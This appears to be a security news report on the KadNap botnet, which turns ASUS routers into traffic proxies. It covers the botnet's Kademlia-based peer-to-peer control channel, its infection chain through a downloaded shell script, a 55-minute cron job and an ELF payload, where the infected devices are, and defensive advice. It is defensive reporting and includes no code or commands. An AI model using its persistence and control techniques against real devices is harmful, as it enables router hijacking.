A newly identified botnet, dubbed KadNap, is actively compromising ASUS routers and other edge networking devices, transforming them into proxies for malicious internet traffic. According to research from Lumen Technologies' Black Lotus Labs, the botnet has grown significantly since August 2025, now encompassing approximately 14,000 devices. These infected devices form a peer-to-peer (P2P) network that leverages a customized version of the Kademlia Distributed Hash Table (DHT) protocol for command-and-control (C2) communications. This decentralized architecture makes the botnet particularly resilient, as there is no single point of failure; C2 information is distributed across the network, with each node managing only a subset of the total data, complicating identification and takedown efforts for defenders.
The infection chain begins when a vulnerable device downloads a malicious shell script (`aic.sh`) from a specific IP address. This script establishes persistence by creating a cron job that executes every 55 minutes. The final payload is an ELF binary named `kad`, which installs the KadNap client. Once active, the malware performs reconnaissance to determine the host's external IP address and contacts multiple Network Time Protocol (NTP) servers to ensure accurate time synchronization—a critical step for coordinating activities and potentially evading time-based detection mechanisms. The primary function of these hijacked devices is to act as proxies, routing traffic for other cybercriminal activities, which can include credential theft, distributed denial-of-service (DDoS) attacks, and anonymizing malicious actors' connections.
Geographically, the KadNap botnet shows a concentrated footprint. Nearly 60% of the infected devices are located in the United States, with significant percentages also found in Taiwan, Hong Kong, and Russia. Researchers note that nearly half of the KadNap network communicates with C2 infrastructure specifically dedicated to bots running on ASUS hardware, while the remainder connects to two separate control servers. This targeting suggests the attackers may be exploiting known or specific vulnerabilities in ASUS router firmware. The use of a P2P network built on a modified Kademlia DHT is a notable evolution in botnet design, moving away from traditional centralized C2 servers to a more robust and stealthy model that is harder to dismantle.
For network defenders and home users, the emergence of KadNap underscores the critical importance of securing edge devices. Recommendations include immediately changing default credentials on routers, disabling remote administration features unless absolutely necessary, and ensuring router firmware is always updated to the latest version. Organizations should monitor network traffic for unusual outbound connections or unexpected proxy-like behavior from internal devices. The botnet's growth also highlights a broader trend of cybercriminals increasingly targeting often-overlooked network infrastructure to build large-scale, resilient platforms for their operations, making continuous vigilance and proactive patching essential components of modern cybersecurity hygiene.
